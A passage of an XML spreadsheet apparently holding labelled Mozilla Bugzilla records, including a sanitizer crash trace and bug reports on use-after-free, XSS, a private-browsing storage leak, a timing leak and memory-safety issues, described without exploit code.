    #25 0x7f6cf0ec00ca in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:844
    #26 0x7f6cf0ec00ca in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4311
    #27 0x7f6cf0ea05d4 in GetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:192:12
    #28 0x7f6cf0ea05d4 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2674
    #29 0x7f6cf0e80fa1 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:406:12
    #30 0x7f6cf0eb759c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:478:15
    #31 0x7f6cf0eb7c52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:524:10
    #32 0x7f6cf16f175d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2847:12
    #33 0x7f6ceafc986f in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #34 0x7f6ceb8eecf7 in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #35 0x7f6ceb8eecf7 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #36 0x7f6ceb8b8e6d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1136:16
    #37 0x7f6ceb8ba9ec in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1318:20
    #38 0x7f6ceb8a5433 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:5
    #39 0x7f6ceb8a8d24 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #40 0x7f6ceda6ace9 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1044:7
    #41 0x7f6cee91c41e in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7628:5
    #42 0x7f6cee918354 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7432:7
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/nsISupportsImpl.h:58:36 in GetThread
Shadow bytes around the buggy address:
  0x0c1a80001400: fa fa fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a80001410: fd fd fd fd fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c1a80001420: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c1a80001430: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
  0x0c1a80001440: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
=&gt;0x0c1a80001450: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
  0x0c1a80001460: fd fd fa fa fa fa fa fa fa fa 00 00 00 00 00 00
  0x0c1a80001470: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
  0x0c1a80001480: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a80001490: fd fd fd fd fd fd fa fa fa fa fa fa fa fa 00 00
  0x0c1a800014a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00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5681==ABORTING</t>
        </is>
      </c>
      <c r="X1498" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1499">
      <c r="A1499" t="n">
        <v>1878577</v>
      </c>
      <c r="B1499" t="inlineStr">
        <is>
          <t>2024-02-04 14:28:53 -0800</t>
        </is>
      </c>
      <c r="C1499" t="inlineStr">
        <is>
          <t>Private repository not removed on browser shutdown when PBM autostart is enabled</t>
        </is>
      </c>
      <c r="D1499" t="inlineStr">
        <is>
          <t>2024-09-18 19:40:42 -0700</t>
        </is>
      </c>
      <c r="E1499" t="n">
        <v>1</v>
      </c>
      <c r="F1499" t="n">
        <v>1</v>
      </c>
      <c r="G1499" t="n">
        <v>3</v>
      </c>
      <c r="H1499" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1499" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1499" t="inlineStr">
        <is>
          <t>Storage: Quota Manager</t>
        </is>
      </c>
      <c r="K1499" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1499" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1499" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1499" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1499" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1499" t="inlineStr">
        <is>
          <t>[adv-main126+] [adv-ESR115.11+]</t>
        </is>
      </c>
      <c r="Q1499" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1499" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1499" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T1499" t="n">
        <v>1</v>
      </c>
      <c r="U1499" t="n">
        <v>0</v>
      </c>
      <c r="V1499" t="n">
        <v>35</v>
      </c>
      <c r="W1499" t="inlineStr">
        <is>
          <t>Originally reported by a 김도훈_5791 to the Tor Project (tracked by [this issue](https://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/42391)).
If a website uses IndexDB in a private browsing window, the storage files are encrypted with a key kept in RAM only, and put in a directory named `private`.
This directory gets removed as soon as the PB window is closed.
Unfortunately, if the  `browser.privatebrowsing.autostart` preference is `true` (Tor Browser's default) the `private` directory and its content are kept in place after browser's shutdown.
Steps to reproduce:
1. On a clean Firefox profile, set browser.privatebrowsing.autostart to true and restart the browser
2. Navigate to https://people.torproject.org/~ma1/test/idb/
3. Verify that a $PROFILE_DIR/storage/private has been created with encrypted db files inside
3. Quit Firefox
Expected result: the $PROFILE_DIR/storage/private directory doesn't exist anymore
Actual result: the $PROFILE_DIR/storage/private is still there with its content
Actually retrieving data from the encrypted database or even knowing which website it belongs requires searching a frozen snapshot of the RAM for the decryption keys, kept there during the browsing session. Furthermore you could always end in this situation if the browser just crashes, or if a determined and resourceful attacker manages to recover the encrypted files from the persistent storage after deletion.
Nonetheless I think we want this deletion policy to work as reliably as possible in global PBM as well, for consistency sake if nothing else.</t>
        </is>
      </c>
      <c r="X1499" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1500">
      <c r="A1500" t="n">
        <v>960044</v>
      </c>
      <c r="B1500" t="inlineStr">
        <is>
          <t>2014-01-15 05:34:13 -0800</t>
        </is>
      </c>
      <c r="C1500" t="inlineStr">
        <is>
          <t>[dev] IARC submissionID/secCode form fails + pingback never comes on -dev</t>
        </is>
      </c>
      <c r="D1500" t="inlineStr">
        <is>
          <t>2014-03-28 09:32:02 -0700</t>
        </is>
      </c>
      <c r="E1500" t="n">
        <v>1</v>
      </c>
      <c r="F1500" t="n">
        <v>1</v>
      </c>
      <c r="G1500" t="n">
        <v>6</v>
      </c>
      <c r="H1500" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1500" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J1500" t="inlineStr">
        <is>
          <t>Developer Pages</t>
        </is>
      </c>
      <c r="K1500" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L1500" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1500" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1500" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1500" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1500" t="inlineStr">
        <is>
          <t>[fromAutomation] [qa+] [incorrect_implementation]</t>
        </is>
      </c>
      <c r="Q1500" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1500" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1500" t="inlineStr">
        <is>
          <t>2014-01-21</t>
        </is>
      </c>
      <c r="T1500" t="n">
        <v>1</v>
      </c>
      <c r="U1500" t="n">
        <v>0</v>
      </c>
      <c r="V1500" t="n">
        <v>42</v>
      </c>
      <c r="W1500" t="inlineStr">
        <is>
          <t>Our automated tests fail when submitting an app at Content Ratings step.
STR:
1. Go to https://marketplace-dev.allizom.org/developers and login
2. Upload an app, or if you already have one try to set the Content Ratings
3. When you get to the Content Ratings step, enter submission_id and security_code if you already have them set.
4. Click Submit button.
Expected results:
"Congratulations, your app submission is now complete and will be reviewed shortly!" message should appear and app submission is complete.
Actual results:
"Invalid submission_id or security_code message appears when testing manually, but nothing appears/happens when automated test is running, not even a warning message appears.
Here is a screencast:
http://screencast.com/t/z0PfyUyJGRz</t>
        </is>
      </c>
      <c r="X1500" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1501">
      <c r="A1501" t="n">
        <v>451680</v>
      </c>
      <c r="B1501" t="inlineStr">
        <is>
          <t>2008-08-21 23:55:57 -0700</t>
        </is>
      </c>
      <c r="C1501" t="inlineStr">
        <is>
          <t>XSS by attaching a binding to an element in an unloaded document</t>
        </is>
      </c>
      <c r="D1501" t="inlineStr">
        <is>
          <t>2008-12-16 18:27:12 -0800</t>
        </is>
      </c>
      <c r="E1501" t="n">
        <v>1</v>
      </c>
      <c r="F1501" t="n">
        <v>1</v>
      </c>
      <c r="G1501" t="n">
        <v>3</v>
      </c>
      <c r="H1501" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1501" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1501" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1501" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1501" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1501" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1501" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1501" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1501" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q1501" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1501" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1501" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1501" t="n">
        <v>1</v>
      </c>
      <c r="U1501" t="n">
        <v>0</v>
      </c>
      <c r="V1501" t="n">
        <v>21</v>
      </c>
      <c r="W1501" t="inlineStr">
        <is>
          <t>It's possible to use a binding to perform an XSS attack in a similar way to bug
428672 and bug 433328.</t>
        </is>
      </c>
      <c r="X1501" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1502">
      <c r="A1502" t="n">
        <v>1254876</v>
      </c>
      <c r="B1502" t="inlineStr">
        <is>
          <t>2016-03-08 22:42:17 -0800</t>
        </is>
      </c>
      <c r="C1502" t="inlineStr">
        <is>
          <t>Intermittent 1113005.html | application crashed [@ webrtc::AudioDeviceWindowsCore::DoCaptureThread()]</t>
        </is>
      </c>
      <c r="D1502" t="inlineStr">
        <is>
          <t>2016-09-22 17:18:54 -0700</t>
        </is>
      </c>
      <c r="E1502" t="n">
        <v>1</v>
      </c>
      <c r="F1502" t="n">
        <v>1</v>
      </c>
      <c r="G1502" t="n">
        <v>3</v>
      </c>
      <c r="H1502" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1502" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1502" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K1502" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1502" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1502" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1502" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1502" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1502" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main46+][adv-esr45.1+][adv-esr38.8+]</t>
        </is>
      </c>
      <c r="Q1502" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1502" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1502" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T1502" t="n">
        <v>1</v>
      </c>
      <c r="U1502" t="n">
        <v>0</v>
      </c>
      <c r="V1502" t="n">
        <v>19</v>
      </c>
      <c r="W1502" t="inlineStr">
        <is>
          <t>https://treeherder.mozilla.org/logviewer.html#?job_id=23311962&amp;repo=mozilla-inbound</t>
        </is>
      </c>
      <c r="X1502" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1503">
      <c r="A1503" t="n">
        <v>1130150</v>
      </c>
      <c r="B1503" t="inlineStr">
        <is>
          <t>2015-02-05 14:12:17 -0800</t>
        </is>
      </c>
      <c r="C1503" t="inlineStr">
        <is>
          <t>AudioGUM thread can access freed SourceMediaStream under heavy load</t>
        </is>
      </c>
      <c r="D1503" t="inlineStr">
        <is>
          <t>2016-07-02 10:34:52 -0700</t>
        </is>
      </c>
      <c r="E1503" t="n">
        <v>1</v>
      </c>
      <c r="F1503" t="n">
        <v>1</v>
      </c>
      <c r="G1503" t="n">
        <v>3</v>
      </c>
      <c r="H1503" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1503" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1503" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K1503" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1503" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1503" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1503" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1503" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1503" t="inlineStr">
        <is>
          <t>[adv-main37+]</t>
        </is>
      </c>
      <c r="Q1503" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1503" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1503" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T1503" t="n">
        <v>1</v>
      </c>
      <c r="U1503" t="n">
        <v>0</v>
      </c>
      <c r="V1503" t="n">
        <v>13</v>
      </c>
      <c r="W1503" t="inlineStr">
        <is>
          <t>8 simultaneous pc_tests (16 PeerConnections); had a failure in the AudioGUM runnable in AppendToTrack because *this was freed memory.  (a5)
Linux64, debug nightly.  More details to come.</t>
        </is>
      </c>
      <c r="X1503" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1504">
      <c r="A1504" t="n">
        <v>941887</v>
      </c>
      <c r="B1504" t="inlineStr">
        <is>
          <t>2013-11-21 13:56:46 -0800</t>
        </is>
      </c>
      <c r="C1504" t="inlineStr">
        <is>
          <t>feDisplacementMap should check taintedness of the image with the displacements</t>
        </is>
      </c>
      <c r="D1504" t="inlineStr">
        <is>
          <t>2018-05-07 10:38:27 -0700</t>
        </is>
      </c>
      <c r="E1504" t="n">
        <v>1</v>
      </c>
      <c r="F1504" t="n">
        <v>1</v>
      </c>
      <c r="G1504" t="n">
        <v>3</v>
      </c>
      <c r="H1504" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1504" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1504" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K1504" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1504" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1504" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1504" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1504" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1504" t="inlineStr">
        <is>
          <t>[adv-main28+][pixel-stealing]</t>
        </is>
      </c>
      <c r="Q1504" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1504" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1504" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T1504" t="n">
        <v>1</v>
      </c>
      <c r="U1504" t="n">
        <v>0</v>
      </c>
      <c r="V1504" t="n">
        <v>28</v>
      </c>
      <c r="W1504" t="inlineStr">
        <is>
          <t>Security sensitive for now since there's an information leak here that we're plugging.
There is really no way to prevent timing attacks revealing information about the contents of the displacements input to feDisplacementMap. These displacements control the addresses of memory fetches into the other input image. These fetches can be made fast or slow by concentrating them into one location or by spreading them out, due to cache effects. Making all the fetches equally slow would be difficult to do and result in horrible performance.
However, in many important use-cases of feDisplacementMap, we can easily prove that the displacements input image does not depend on content from a different origin than the page. So we can restrict feDisplacementMap to only work when we can prove that, instead of disabling it completely.
I suggest we do the following:
-- Assign an origin-clean flag to each filter primitive. By default, a filter primitive is origin-clean if and only if all of its inputs are origin-clean. (It follows that a filter primitive with no inputs is origin-clean.)
-- An feImage is origin-clean if drawing &lt;img&gt; element with the same source to an origin-clean canvas would leave the canvas origin-clean.
-- If the feDisplacementMap's displacements input is not origin-clean, it should produce transparent black.</t>
        </is>
      </c>
      <c r="X1504" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1505">
      <c r="A1505" t="n">
        <v>1556934</v>
      </c>
      <c r="B1505" t="inlineStr">
        <is>
          <t>2019-06-04 21:48:02 -0700</t>
        </is>
      </c>
      <c r="C1505" t="inlineStr">
        <is>
          <t>Don't include paths in the origin field of manually added logins</t>
        </is>
      </c>
      <c r="D1505" t="inlineStr">
        <is>
          <t>2022-12-15 06:12:37 -0800</t>
        </is>
      </c>
      <c r="E1505" t="n">
        <v>1</v>
      </c>
      <c r="F1505" t="n">
        <v>1</v>
      </c>
      <c r="G1505" t="n">
        <v>2</v>
      </c>
      <c r="H1505" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1505" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1505" t="inlineStr">
        <is>
          <t>about:logins</t>
        </is>
      </c>
      <c r="K1505" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1505" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1505" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1505" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1505" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1505" t="inlineStr">
        <is>
          <t xml:space="preserve">[passwords:management] [skyline] </t>
        </is>
      </c>
      <c r="Q1505" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1505" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1505" t="inlineStr">
        <is>
          <t>Firefox 69</t>
        </is>
      </c>
      <c r="T1505" t="n">
        <v>1</v>
      </c>
      <c r="U1505" t="n">
        <v>0</v>
      </c>
      <c r="V1505" t="n">
        <v>11</v>
      </c>
      <c r="W1505" t="inlineStr">
        <is>
          <t>Bug 1550109 used `type=url` but didn't enforce that the URL was an origin without a path component. This is important to fix to not get invalid data in storage and Sync which will cause us pain for years to come in bug reports.</t>
        </is>
      </c>
      <c r="X1505" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1506">
      <c r="A1506" t="n">
        <v>1667102</v>
      </c>
      <c r="B1506" t="inlineStr">
        <is>
          <t>2020-09-24 07:01:58 -0700</t>
        </is>
      </c>
      <c r="C1506" t="inlineStr">
        <is>
          <t>Crash in [@ mozilla::net::Http2Stream::TransmitFrame]</t>
        </is>
      </c>
      <c r="D1506" t="inlineStr">
        <is>
          <t>2022-08-26 17:55:25 -0700</t>
        </is>
      </c>
      <c r="E1506" t="n">
        <v>1</v>
      </c>
      <c r="F1506" t="n">
        <v>1</v>
      </c>
      <c r="G1506" t="n">
        <v>3</v>
      </c>
      <c r="H1506" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1506" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1506" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K1506" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1506" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M1506" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N1506" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1506" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1506" t="inlineStr">
        <is>
          <t>[necko-triaged][sec-survey][adv-main93+][adv-esr91.3+]</t>
        </is>
      </c>
      <c r="Q1506" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1506" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1506" t="inlineStr">
        <is>
          <t>94 Branch</t>
        </is>
      </c>
      <c r="T1506" t="n">
        <v>1</v>
      </c>
      <c r="U1506" t="n">
        <v>0</v>
      </c>
      <c r="V1506" t="n">
        <v>45</v>
      </c>
      <c r="W1506" t="inlineStr">
        <is>
          <t>Crash report: https://crash-stats.mozilla.org/report/index/c27d1c1c-2530-4f43-9ce4-c4d000200924
Top 10 frames of crashing thread:
```
0  @0x858481e6 
1  @0xebeacfc6 
2 xul.dll mozilla::net::Http2Stream::TransmitFrame netwerk/protocol/http/Http2Stream.cpp:971
3 xul.dll mozilla::net::Http2Stream::OnReadSegment netwerk/protocol/http/Http2Stream.cpp:1516
4 xul.dll static mozilla::net::nsHttpTransaction::ReadRequestSegment netwerk/protocol/http/nsHttpTransaction.cpp:725
5 xul.dll nsBufferedInputStream::ReadSegments netwerk/base/nsBufferedStreams.cpp:446
6 xul.dll mozilla::net::nsHttpTransaction::ReadSegments netwerk/protocol/http/nsHttpTransaction.cpp:752
7 xul.dll mozilla::net::Http2Stream::ReadSegments netwerk/protocol/http/Http2Stream.cpp:164
8 xul.dll mozilla::net::Http2Session::ReadSegmentsAgain netwerk/protocol/http/Http2Session.cpp:2815
9 xul.dll mozilla::net::nsHttpConnection::OnSocketWritable netwerk/protocol/http/nsHttpConnection.cpp:1993
```
Most of these crashes seem to be `EXCEPTION_ACCESS_VIOLATION_EXEC` which might be scary?</t>
        </is>
      </c>
      <c r="X1506" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1507">
      <c r="A1507" t="n">
        <v>1186725</v>
      </c>
      <c r="B1507" t="inlineStr">
        <is>
          <t>2015-07-22 17:44:02 -0700</t>
        </is>
      </c>
      <c r="C1507" t="inlineStr">
        <is>
          <t>Memory-safety bug in InitTextures</t>
        </is>
      </c>
      <c r="D1507" t="inlineStr">
        <is>
          <t>2024-05-30 09:03:26 -0700</t>
        </is>
      </c>
      <c r="E1507" t="n">
        <v>1</v>
      </c>
      <c r="F1507" t="n">
        <v>1</v>
      </c>
      <c r="G1507" t="n">
        <v>3</v>
      </c>
      <c r="H1507" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1507" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1507" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K1507" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L1507" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1507" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1507" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1507" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1507" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+]</t>
        </is>
      </c>
      <c r="Q1507" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1507" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1507" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T1507" t="n">
        <v>1</v>
      </c>
      <c r="U1507" t="n">
        <v>0</v>
      </c>
      <c r="V1507" t="n">
        <v>15</v>
      </c>
      <c r="W1507" t="inlineStr">
        <is>
          <t>InitTextures (gfx\layers\IMFYCbCrImage.cpp) can cause its callers to use a wild pointer to read and/or write data to memory. This is because it calls IDirect3DSurface9::LockRect without checking the return code. Instead, it checks whether the resulting aLockedRect.pBits member == nullptr. It then returns aLockedRect to its callers, which use its members to read and/or write data into memory that (on success) would be mapped to a GPU buffer. 
The problem is that InitTextures receives aLockedRect from its caller, and does not itself initialize it. As it happens, its only known caller (UploadData) passes a reference to an uninitialized automatic D3DLOCKED_RECT to InitTextures. D3DLOCKED_RECT also lacks a constructor, so it does not initialize itself.
The upshot is that if LockRect fails (as under OOM conditions), UploadData will overwrite (probably a considerable amount of) memory at some arbitrary place in Firefox's address space.
116: static bool UploadData(IDirect3DDevice9* aDevice,
117:                        RefPtr&lt;IDirect3DTexture9&gt;&amp; aTexture,
118:                        HANDLE&amp; aHandle,
119:                        uint8_t* aSrc,
120:                        const gfx::IntSize&amp; aSrcSize,
121:                        int32_t aSrcStride)
122: {
123:   RefPtr&lt;IDirect3DSurface9&gt; surf;
124:   D3DLOCKED_RECT rect;
125:   aTexture = InitTextures(aDevice, aSrcSize, D3DFMT_A8, surf, aHandle, rect);
126:   if (!aTexture) {
127:     return false;
128:   }
...
59: static TemporaryRef&lt;IDirect3DTexture9&gt;
60: InitTextures(IDirect3DDevice9* aDevice,
61:              const IntSize &amp;aSize,
62:             _D3DFORMAT aFormat,
63:             RefPtr&lt;IDirect3DSurface9&gt;&amp; aSurface,
64:             HANDLE&amp; aHandle,
65:             D3DLOCKED_RECT&amp; aLockedRect)
66: {
...
92:   aSurface-&gt;LockRect(&amp;aLockedRect, nullptr, 0);
93:   if (!aLockedRect.pBits) {
94:     NS_WARNING("Could not lock surface");
95:     return nullptr;
96:   }
97:
98:   return result;
99: }</t>
        </is>
      </c>
      <c r="X1507" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1508">
      <c r="A1508" t="n">
        <v>1067007</v>
      </c>
      <c r="B1508" t="inlineStr">
        <is>
          <t>2014-09-13 09:45:23 -0700</t>
        </is>
      </c>
      <c r="C1508" t="inlineStr">
        <is>
          <t>[mozmill] tests do not work after TB build changes</t>
        </is>
      </c>
      <c r="D1508" t="inlineStr">
        <is>
          <t>2014-09-15 04:18:52 -0700</t>
        </is>
      </c>
      <c r="E1508" t="n">
        <v>1</v>
      </c>
      <c r="F1508" t="n">
        <v>1</v>
      </c>
      <c r="G1508" t="n">
        <v>2</v>
      </c>
      <c r="H1508" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1508" t="inlineStr">
        <is>
